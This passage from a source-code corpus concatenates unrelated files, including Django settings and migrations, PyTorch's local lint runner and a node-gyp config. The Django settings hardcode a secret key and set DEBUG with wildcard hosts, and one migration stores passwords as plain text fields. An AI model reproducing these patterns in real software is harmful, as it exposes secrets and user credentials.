employee[index] = new_name
if choice == 5:
#print(employee)
x=1
for i in employee:
print (str(x) + "." + i)
x += 1
if choice == 6:
break;
| [
"anee1234@gmail.com"
] | anee1234@gmail.com |
46780ffe28ee6581b83e37f84a8955507f9583fc | 80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019 | /data/HackerRank-Mathematics/Constructing a Number.py | c87d42e4fdaa23fd44e0b8922ae34ab56bbcd61e | [] | no_license | Ritvik19/CodeBook | ef7764d89b790e902ede5802f36d5ca910d8a50e | 2b4ed7938bbf156553d6ba5cba6216449528f0fc | refs/heads/master | 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | #!/bin/python3
import math
import os
import random
import re
import sys
def canConstruct(a):
return "Yes" if sum(a) % 3 == 0 else "No"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
n = int(input())
a = list(map(int, input().rstrip().split()))
result = canConstruct(a)
fptr.write(result + '\n')
fptr.close()
| [
"rastogiritvik99@gmail.com"
] | rastogiritvik99@gmail.com |
4abb7fabbd57ff0a857464e0b5557d97d45f5452 | 7a9034fa0698e9b6481c5de35ffd91c96d7552e9 | /personal_site/settings.py | 744f94f86bf4b5ecbb9947fff3a52102ef65e017 | [] | no_license | k4u5h4L/personal_site | 0e3144b62d9be0e08cf803cc5378c75f40425735 | 807867332e9bca759e2de8a28eb1840d2dd6a451 | refs/heads/main | 2023-02-07T07:52:11.031056 | 2020-12-19T16:36:38 | 2020-12-19T16:36:38 | 322,577,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,785 | py | """
Django settings for personal_site project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
import json
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&q_x8wc#6ahgx(yk58au#nide7=58-xd$h)^0=x-g)&r+=x)mb'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'portfolio',
'users',
'blog',
'django_filters',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'personal_site.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'personal_site.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "blog/static")
APPEND_SLASH = False
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
MEDIA_URL = '/media/'
AUTH_USER_MODEL = 'users.CustomUser'
LOGIN_URL = 'landing_page'
LOGIN_REDIRECT_URL = 'home_page'
LOGOUT_REDIRECT_URL = 'landing_page'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
with open(f'{os.getcwd()}/personal_site/config.json') as fp:
email_cred = json.load(fp)
EMAIL_HOST_USER = email_cred['EMAIL_USR']
EMAIL_HOST_PASSWORD = email_cred['EMAI_PASSWD']
EMAIL_USE_TLS = True
| [
"kaushal.v.bhat@gmail.com"
] | kaushal.v.bhat@gmail.com |
19238e70fd393bcd03742fde34353046b147ce19 | 14ccb6cc40980fe25440da3a18a113e8bcdf4efa | /blog/migrations/0001_initial.py | f1ea14304585cadb4806b86bf11a38c632191a98 | [] | no_license | BatoAlvin/koola | 1bc433aa4fa1a0d3f91221260c51242d5eea0692 | 0015565ec44428097ca1a4e9dcf19e7b3dbd33ff | refs/heads/master | 2023-02-23T13:20:51.459968 | 2021-01-21T19:17:38 | 2021-01-21T19:17:38 | 331,552,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,277 | py | # Generated by Django 3.1.5 on 2021-01-20 19:06
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Destination',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100)),
('first_name', models.CharField(max_length=100)),
('last_name', models.CharField(max_length=100)),
('email', models.CharField(max_length=100)),
('password1', models.CharField(max_length=100)),
('password2', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Employee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.IntegerField()),
('date', models.DateField(blank=True)),
('location', models.CharField(max_length=100)),
('occupation', models.CharField(max_length=100)),
],
),
]
| [
"alvinbato112@gmail.com"
] | alvinbato112@gmail.com |
16f2f9490ec4a93471d45983ce6e3dc1fb71d1e2 | 2a03132e5742ea5d4012327194bc7ec4e7096194 | /tools/actions_local_runner.py | 4082abda527b90fe1b0a7da2a316ef5323d1dabd | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | jmnarloch/pytorch | 11f7be7b6d47b11868ede673879f651084f4e976 | 74c12da4517c789bea737dc947d6adc755f63176 | refs/heads/master | 2023-05-05T07:40:18.135517 | 2021-05-24T04:34:55 | 2021-05-24T04:36:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,495 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import subprocess
import sys
import os
import argparse
import yaml
import asyncio
import shutil
import re
import fnmatch
import shlex
import configparser
from typing import List, Dict, Any, Optional, Tuple, Union
# Absolute path to the repository root (two directories up from this file in tools/).
REPO_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
class col:
    """ANSI escape codes used to colorize terminal output."""
    HEADER = "\033[95m"
    BLUE = "\033[94m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    RED = "\033[91m"
    # RESET clears all attributes (color and bold) back to the terminal default.
    RESET = "\033[0m"
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"
def should_color() -> bool:
    """Return True when stdout is an interactive terminal (safe to emit ANSI codes)."""
    stream = sys.stdout
    # Some stdout replacements (e.g. in CI harnesses) lack isatty entirely.
    if not hasattr(stream, "isatty"):
        return False
    return stream.isatty()
def color(the_color: str, text: str) -> str:
    """Return *text* wrapped in bold plus *the_color*, or unchanged when not a tty."""
    if not should_color():
        return text
    return "".join([col.BOLD, the_color, str(text), col.RESET])
def cprint(the_color: str, text: str) -> None:
    """Print *text*, colorized when stdout is an interactive terminal."""
    message = color(the_color, text) if should_color() else text
    print(message)
def git(args: List[str]) -> List[str]:
    """Run a git command from the repo root and return its stdout as stripped lines.

    Raises subprocess.CalledProcessError when git exits non-zero.
    """
    completed = subprocess.run(
        ["git", *args],
        cwd=REPO_ROOT,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        check=True,
    )
    output = completed.stdout.decode().strip()
    return [piece.strip() for piece in output.split("\n")]
def find_changed_files() -> List[str]:
    """Return every file changed relative to origin/master.

    Gathers untracked files, unstaged and staged modifications, and commits
    since the merge-base with origin/master, then de-duplicates and drops
    entries that no longer exist on disk (e.g. deletions).
    """
    # Untracked files show up as '?? <name>' in porcelain status output.
    untracked = [
        line.replace("?? ", "")
        for line in git(["status", "--porcelain"])
        if line.startswith("?? ")
    ]

    # Modified but unstaged.
    unstaged = git(["diff", "--name-only"])
    # Modified and staged.
    staged = git(["diff", "--cached", "--name-only"])

    # Already committed on this branch.
    merge_base = git(["merge-base", "origin/master", "HEAD"])[0]
    committed = git(["diff", "--name-only", merge_base, "HEAD"])

    # De-duplicate, keeping only paths that still exist.
    unique = set()
    for candidate in untracked + staged + unstaged + committed:
        name = candidate.strip()
        if name and os.path.exists(name):
            unique.add(name)
    return list(unique)
def print_results(job_name: str, passed: bool, streams: List[str]) -> None:
    """Print a pass/fail header for *job_name*, then any non-empty output streams."""
    header(job_name, passed)
    for output in streams:
        trimmed = output.strip()
        if trimmed:
            print(trimmed)
async def shell_cmd(
    cmd: Union[str, List[str]],
    env: Optional[Dict[str, Any]] = None,
    redirect: bool = True,
) -> Tuple[bool, str, str]:
    """Run *cmd* through bash in the repo root.

    Args:
        cmd: either a pre-built shell string or a list of arguments, which is
            shell-quoted and joined into one.
        env: optional environment for the child process (None inherits ours).
        redirect: when True, capture stdout/stderr and return them; when
            False, let the child write straight to our streams.

    Returns:
        (passed, stdout, stderr) — stdout/stderr are empty strings when
        redirect is False.
    """
    if isinstance(cmd, list):
        cmd_str = ' '.join(shlex.quote(arg) for arg in cmd)
    else:
        cmd_str = cmd

    # NB: the previous 'shell=True' kwarg was redundant: create_subprocess_shell
    # always runs the command through a shell, and the event loop's
    # subprocess_shell rejects shell=False anyway.
    proc = await asyncio.create_subprocess_shell(
        cmd_str,
        cwd=REPO_ROOT,
        env=env,
        stdout=subprocess.PIPE if redirect else None,
        stderr=subprocess.PIPE if redirect else None,
        # Force bash so the GHA scripts (which assume bash) behave as in CI.
        executable=shutil.which("bash"),
    )
    stdout, stderr = await proc.communicate()

    passed = proc.returncode == 0
    if not redirect:
        # Nothing was captured; communicate() returned (None, None).
        return passed, "", ""

    return passed, stdout.decode().strip(), stderr.decode().strip()
def header(name: str, passed: bool) -> None:
    """Print a one-line colored status header: a green check or red x, then the name."""
    icon = color(col.GREEN, "✓") if passed else color(col.RED, "x")
    print(f"{icon} {color(col.BLUE, name)}")
def get_flake_excludes() -> List[str]:
    """Read the 'exclude' patterns from the repo's .flake8 config file."""
    parser = configparser.ConfigParser()
    parser.read(os.path.join(REPO_ROOT, ".flake8"))

    raw = parser["flake8"]["exclude"].strip()
    # The config value is a comma-separated list; drop empty entries.
    return [entry.strip() for entry in re.split(r',\s*', raw) if entry.strip() != ""]
async def run_flake8(files: Optional[List[str]], quiet: bool) -> bool:
    """Run flake8, optionally restricted to an explicit list of files.

    When *files* is given (quicklint), entries matching the .flake8 excludes
    are dropped first; an empty remainder counts as a pass without invoking
    flake8 at all. Returns True on success.
    """
    excludes = get_flake_excludes()

    def excluded(name: str) -> bool:
        # A file is skipped when it matches an exclude glob or starts with an
        # excluded path prefix (with or without a leading './').
        return any(
            fnmatch.fnmatch(name, pat=pattern)
            or name.startswith(pattern)
            or ("./" + name).startswith(pattern)
            for pattern in excludes
        )

    cmd = ["flake8"]
    if files is not None:
        included = [f for f in files if not excluded(f)]
        if not included:
            print_results("flake8", True, [])
            return True

        # Running quicklint, pass in an explicit list of files (unlike mypy,
        # flake8 will still use .flake8 to filter this list by the 'exclude's
        # in the config
        cmd += included

    passed, stdout, stderr = await shell_cmd(cmd)
    print_results("flake8", passed, [stdout, stderr])
    return passed
async def run_mypy(files: Optional[List[str]], quiet: bool) -> bool:
    """Run mypy either on an explicit file list (quicklint) or via lint.yml.

    With *files*, delegates to tools/mypy_wrapper.py, which decides per-file
    whether it should be type-checked. Without *files*, replays the 'Run
    autogen' and 'Run mypy' steps of the mypy job in lint.yml by re-invoking
    this script. Returns True when the (final) mypy step passes.
    """
    env = os.environ.copy()
    if should_color():
        # Secret env variable: https://github.com/python/mypy/issues/7771
        env["MYPY_FORCE_COLOR"] = "1"
    if files is not None:
        # Running quick lint, use mypy-wrapper instead so it checks that the files
        # actually should be linted
        passed, stdout, stderr = await shell_cmd(
            [sys.executable, "tools/mypy_wrapper.py"] + [
                os.path.join(REPO_ROOT, f) for f in files
            ],
            env=env,
        )
        print_results("mypy (skipped typestub generation)", passed, [
            stdout + "\n",
            stderr + "\n",
        ])
        return passed
    # Not running quicklint, so use lint.yml
    # The autogen step's result is intentionally discarded: only the mypy
    # step below determines pass/fail.
    _, _, _ = await shell_cmd(
        [
            sys.executable,
            "tools/actions_local_runner.py",
            "--job",
            "mypy",
            "--file",
            ".github/workflows/lint.yml",
            "--step",
            "Run autogen",
        ],
        redirect=False,
        env=env,
    )
    passed, _, _ = await shell_cmd(
        [
            sys.executable,
            "tools/actions_local_runner.py",
            "--job",
            "mypy",
            "--file",
            ".github/workflows/lint.yml",
            "--step",
            "Run mypy",
        ],
        redirect=False,
        env=env,
    )
    return passed
async def run_shellcheck(files: Optional[List[str]], quiet: bool) -> bool:
    """Run ShellCheck, either on specific files (quicklint) or via lint.yml.

    Returns True when the check passes.
    """
    if files is not None:
        # The files list should already be filtered by '--file-filter ".sh"'
        # when calling this script; hand the absolute paths to the wrapper.
        absolute = [os.path.join(REPO_ROOT, f) for f in files]
        ok, out, err = await shell_cmd(["tools/run_shellcheck.sh", *absolute])
        print_results("shellcheck: Run ShellCheck", ok, [
            out + "\n",
            err + "\n",
        ])
        return ok

    # Not running quicklint: replay the 'Run ShellCheck' step of lint.yml by
    # re-invoking this script.
    ok, _, _ = await shell_cmd(
        [
            sys.executable,
            "tools/actions_local_runner.py",
            "--job",
            "shellcheck",
            "--file",
            ".github/workflows/lint.yml",
            "--step",
            "Run ShellCheck",
        ],
        redirect=False,
    )
    return ok
async def run_step(
    step: Dict[str, Any], job_name: str, files: Optional[List[str]], quiet: bool
) -> bool:
    """Run a single GitHub Actions step's 'run' script locally.

    In quiet mode, 'set -eux' is downgraded to 'set -eu' and leading 'time '
    prefixes are stripped so command echoing/timing noise is suppressed.
    Output is only printed when the step fails. Returns True on success.
    """
    env = os.environ.copy()
    # The workflow scripts reference the checkout directory; we run from the
    # live repo instead, so point GITHUB_WORKSPACE somewhere harmless.
    env["GITHUB_WORKSPACE"] = "/tmp"
    script = step["run"]

    if quiet:
        # TODO: Either lint that GHA scripts only use 'set -eux' or make this more
        # resilient
        script = script.replace("set -eux", "set -eu")
        script = re.sub(r"^time ", "", script, flags=re.MULTILINE)
    name = f'{job_name}: {step["name"]}'

    # NB: shell_cmd returns (passed, stdout, stderr); the previous unpacking
    # swapped stdout and stderr, printing the streams in reverse order on
    # failure (inconsistent with every other call site).
    passed, stdout, stderr = await shell_cmd(script, env=env)
    if not passed:
        print_results(name, passed, [stdout, stderr])
    else:
        print_results(name, passed, [])
    return passed
async def run_steps(
    steps: List[Dict[str, Any]], job_name: str, files: Optional[List[str]], quiet: bool
) -> bool:
    """Run every step concurrently; return True only if all of them pass."""
    outcomes = await asyncio.gather(
        *(run_step(step, job_name, files, quiet) for step in steps)
    )
    return all(outcomes)
def relevant_changed_files(file_filters: Optional[List[str]]) -> Optional[List[str]]:
    """Return the sorted changed files, optionally filtered by suffix.

    Returns None when git cannot be queried, which callers treat as
    "check everything". With *file_filters*, only files ending in one of the
    given suffixes are kept.
    """
    try:
        changed = sorted(find_changed_files())
    except Exception:
        # If the git commands failed for some reason, bail out and use the
        # whole list instead.
        print(
            "Could not query git for changed files, falling back to testing all files instead",
            file=sys.stderr,
        )
        return None

    if file_filters is None:
        return changed

    return [
        name
        for name in changed
        if any(name.endswith(suffix) for suffix in file_filters)
    ]
def grab_specific_steps(
    steps_to_grab: List[str], job: Dict[str, Any]
) -> List[Dict[str, Any]]:
    """Pull the named steps out of *job*, preserving the requested order.

    Step names are matched case-insensitively, ignoring surrounding
    whitespace. Raises RuntimeError when any requested step is missing.
    """
    def normalize(name: str) -> str:
        return name.lower().strip()

    found = []
    for wanted in steps_to_grab:
        target = normalize(wanted)
        for candidate in job["steps"]:
            if normalize(candidate["name"]) == target:
                found.append(candidate)
                break

    if len(found) != len(steps_to_grab):
        raise RuntimeError(f"Missing steps:\n{found}\n{steps_to_grab}")

    return found
def main() -> None:
    """Parse CLI args and run the requested job's steps on the local machine."""
    parser = argparse.ArgumentParser(
        description="Pull shell scripts out of GitHub actions and run them"
    )
    parser.add_argument("--file", help="YAML file with actions")
    parser.add_argument(
        "--file-filter",
        help="only pass through files with this extension",
        nargs="*",
    )
    parser.add_argument(
        "--changed-only",
        help="only run on changed files",
        action="store_true",
        default=False,
    )
    parser.add_argument("--job", help="job name", required=True)
    parser.add_argument(
        "--no-quiet", help="output commands", action="store_true", default=False
    )
    parser.add_argument("--step", action="append", help="steps to run (in order)")
    args = parser.parse_args()
    # relevant_files stays None (meaning "all files") unless --changed-only
    # is set and git can be queried.
    relevant_files = None
    quiet = not args.no_quiet
    if args.changed_only:
        relevant_files = relevant_changed_files(args.file_filter)
    if args.file is None:
        # If there is no .yml file provided, fall back to the list of known
        # jobs. We use this for flake8 and mypy since they run different
        # locally than in CI due to 'make quicklint'
        if args.job not in ad_hoc_steps:
            raise RuntimeError(
                f"Job {args.job} not found and no .yml file was provided"
            )
        future = ad_hoc_steps[args.job](relevant_files, quiet)
    else:
        if args.step is None:
            raise RuntimeError("1+ --steps must be provided")
        action = yaml.safe_load(open(args.file, "r"))
        if "jobs" not in action:
            raise RuntimeError(f"top level key 'jobs' not found in {args.file}")
        jobs = action["jobs"]
        if args.job not in jobs:
            raise RuntimeError(f"job '{args.job}' not found in {args.file}")
        job = jobs[args.job]
        # Pull the relevant sections out of the provided .yml file and run them
        relevant_steps = grab_specific_steps(args.step, job)
        future = run_steps(relevant_steps, args.job, relevant_files, quiet)
    # Both branches produce a coroutine; drive it to completion here.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(future)
# These are run differently locally in order to enable quicklint, so dispatch
# out to special handlers instead of using lint.yml
# Maps --job name -> async callable(files, quiet) -> bool.
ad_hoc_steps = {
    "mypy": run_mypy,
    "flake8-py3": run_flake8,
    "shellcheck": run_shellcheck,
}
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        # Exit quietly on Ctrl-C instead of dumping a traceback.
        pass
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
0d1b9c610d1411343055a6f90d03eb24479eea2a | 91c74abe400034336d98490165e89897c6ad2078 | /node_modules/pg/build/config.gypi | 7b7249c67f0842d1c212a49287759cb0c611599e | [
"MIT"
] | permissive | sengcheav/group | 852f8f2c30f1dc79a2cbf2df7924cedb211ec38f | f00ac357fb5d2e144496af9902ff8f8759862c76 | refs/heads/master | 2016-09-15T23:31:19.757192 | 2016-03-01T00:53:14 | 2016-03-01T00:53:14 | 37,701,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,251 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 49,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/usr/pkg",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "true",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"openssl_no_asm": 0,
"python": "/usr/pkg/bin/python2.7",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/u/students/leatseng/.node-gyp/0.10.36",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/pkg/etc/npmignore",
"init_author_url": "",
"shell": "/bin/tcsh",
"parseable": "",
"shrinkwrap": "true",
"email": "",
"init_license": "ISC",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/pkg/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"json": "",
"https_proxy": "http://www-cache.ecs.vuw.ac.nz:8080/",
"description": "true",
"engine_strict": "",
"init_module": "/u/students/leatseng/.npm-init.js",
"userconfig": "/u/students/leatseng/.npmrc",
"node_version": "0.10.36",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "25",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/u/students/leatseng/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/1.4.28 node/v0.10.36 linux x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "63",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/tmp",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/pkg"
}
}
| [
"leatseng@barretts.ecs.vuw.ac.nz"
] | leatseng@barretts.ecs.vuw.ac.nz |
5c03b63199ce12903d3e2e9941d7d45034431151 | de95e9ace929f6279f5364260630e4bf7a658c1c | /recursion.py | bb3d67bb866d8fbe991317696a4fae7cd83a89fe | [] | no_license | ludwigwittgenstein2/Algorithms-Python | ceaf0739b8582f7bd749a9b3f52f283765044744 | c5bed8b2e398c218d1f36e72b05a3f5545cf783a | refs/heads/master | 2021-06-19T11:40:31.012268 | 2017-07-02T04:59:20 | 2017-07-02T04:59:20 | 75,953,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | def factorial(n):
if n == 0:
return 1
else:
recurse = factorial(n - 1)
result = n*recurse
return result
| [
"penpals.oranges14@gmail.com"
] | penpals.oranges14@gmail.com |
2088cf6c06643d2ed7ae354196914827db1fe712 | 5af418f24afe2cc59356c8c64645c570b898934b | /terrarium/geomap/migrations/0001_initial.py | 852f68461249f95c797b8663b4da45fc37b2b708 | [] | no_license | roystchiang/terrarium | a7bcdc2ab5a316b01f4f6598c0aad55316cab8d4 | 9ac5b045d7db43c4cd43d40cca8941cf1f53d642 | refs/heads/master | 2021-05-31T13:06:04.877844 | 2016-05-20T21:22:00 | 2016-05-20T21:22:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-05-10 20:05
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial migration for the geomap app: creates the Place
    # model and the PlacePolygon geometry table that references it.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Place',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('display_name', models.CharField(max_length=255)),
                ('osm_id', models.PositiveIntegerField(unique=True)),
                ('place_id', models.PositiveIntegerField()),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('osm_type', models.IntegerField(choices=[(0, b'None'), (1, b'Node'), (2, b'Way'), (3, b'Relation')], default=0)),
            ],
        ),
        migrations.CreateModel(
            name='PlacePolygon',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('polygon', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('simplicity', models.IntegerField(default=0)),
                # Each polygon belongs to one Place; reverse accessor is
                # place.polygons.
                ('place', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='polygons', to='geomap.Place')),
            ],
        ),
    ]
| [
"crosscent@gmail.com"
] | crosscent@gmail.com |
d8150258ebc46e1cc860b8ddae0fe8c7233727e0 | 334af53a03b4e140b5f5dd9db1c677dfdef325d4 | /tests/config_yaml_test.py | 272ba1848155c4637ccf1fa8637557460df2f998 | [
"Apache-2.0"
] | permissive | IgorFlint/a2ml | fc229c47e3e08ea6aee30aa4219c5c4bc137e987 | c54a8a1770195a702048ca9820353d6d347daf95 | refs/heads/master | 2020-06-15T08:46:17.079004 | 2019-06-21T12:56:19 | 2019-06-21T12:56:19 | 195,252,061 | 1 | 0 | null | 2019-07-04T14:00:34 | 2019-07-04T14:00:34 | null | UTF-8 | Python | false | false | 1,783 | py | from builtins import str
from builtins import object
from argparse import Namespace
from a2ml.api.utils.config_yaml import ConfigYaml
class TestConfigYaml(object):
    """Unit tests for ConfigYaml loading, namespace merging and path access."""

    def setup_method(self, method):
        # Fresh instance per test so no state leaks between cases.
        self.yaml = ConfigYaml()

    def test_load_from_file(self):
        self.yaml.load_from_file('tests/data/iris_train/auger_experiment.yml')
        assert self.yaml.cluster.instance_type == 'c5.2xlarge'

    def test_load_from_file_without_name(self):
        # Both None and an empty string must be rejected with the same message.
        for bad_name in (None, ''):
            try:
                self.yaml.load_from_file(bad_name)
                assert False
            except ValueError as e:
                assert str(e) == 'please provide yaml file name'
            except:
                assert False

    def test_merge_namespace(self):
        ns = Namespace()
        ns.ns_attribute = 'ns value'
        self.yaml.yaml_attribyte = "yaml value"
        self.yaml.merge_namespace(ns)
        expected = {
            'ns_attribute': 'ns value',
            'yaml_attribyte': 'yaml value',
            'filename': None,
        }
        assert vars(self.yaml) == expected

    def test_get_with_path(self):
        leaf = 'value of attr2'
        self.yaml.attr1 = Namespace()
        self.yaml.attr1.attr2 = leaf
        assert self.yaml.get('attr1/attr2') == leaf

    def test_get_default_with_path(self):
        fallback = 'value of attr2'
        assert self.yaml.get('attr1/attr2', fallback) == fallback

    def test_get_default_with_empty_attr(self):
        fallback = 'value of attr2'
        self.yaml.attr1 = Namespace()
        self.yaml.attr1.attr2 = None
        assert self.yaml.get('attr1/attr2', fallback) == fallback
| [
"vlad@dplrn.com"
] | vlad@dplrn.com |
f3bcbcf2b43044c76fd77389f545ad3bef57d962 | 83758b6ff637610f3fdd85da2b14d48e51769dfd | /src/probRobScene/core/pruning.py | 6649d8be9207b6091f4717d9d5880e281393f742 | [
"MIT"
] | permissive | ICRA-2021/ProbRobScene | 58e502c6e33e5fd64fcf71962ceddee1583e3a78 | 2a6f3cac0f51f96955e2fdf18635df0a0985840f | refs/heads/master | 2023-06-23T19:56:51.833905 | 2021-07-20T09:23:06 | 2021-07-20T09:23:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,204 | py | from copy import copy
import time
from typing import List
import probRobScene.core.distributions
from probRobScene.core.intersections import intersect_many, erode_hsis, to_hsi, intersect
from probRobScene.core.object_types import Object
from probRobScene.core.regions import PointInRegionDistribution, Intersection, Intersect, Convex, ConvexPolyhedron, Cuboid
from probRobScene.core.scenarios import Scenario
from probRobScene.core.vectors import Vector3D
from probRobScene.core.distributions import needs_sampling
def prune(s: Scenario, verbosity: int = 1) -> None:
    """Prune the position region of every object in the scenario, with timing."""
    if verbosity >= 1:
        print('  Pruning scenario...')
    started = time.time()
    for obj in s.objects:
        prune_obj(obj, s)
    if verbosity >= 1:
        elapsed = time.time() - started
        print(f'  Pruned scenario in {elapsed:.4g} seconds.')
def prune_obj(o: Object, scenario: Scenario):
    """Narrow a single object's position distribution in place."""
    position = o.position
    if not isinstance(position, PointInRegionDistribution):
        return o

    pruned_pos = position
    if isinstance(position.region, Intersection):
        pruned_pos = PointInRegionDistribution(
            intersect_many(*position.region.regions)
        )

    # With a fixed orientation, we can precisely erode the outer workspace;
    # otherwise we must approximate with a default orientation.
    if needs_sampling(o.orientation):
        eroded_container = erode_container(
            scenario.workspace, o.dimensions, Vector3D(0, 0, 0)
        )
    else:
        eroded_container = erode_container(
            scenario.workspace, o.dimensions, o.orientation
        )

    new_base = intersect_container(eroded_container, pruned_pos.region)
    o.position._conditioned = PointInRegionDistribution(new_base)
@probRobScene.core.distributions.distributionFunction
def intersect_container(container: Convex, obj_pos_region: Intersect):
    """Intersect an object's feasible position region with its container."""
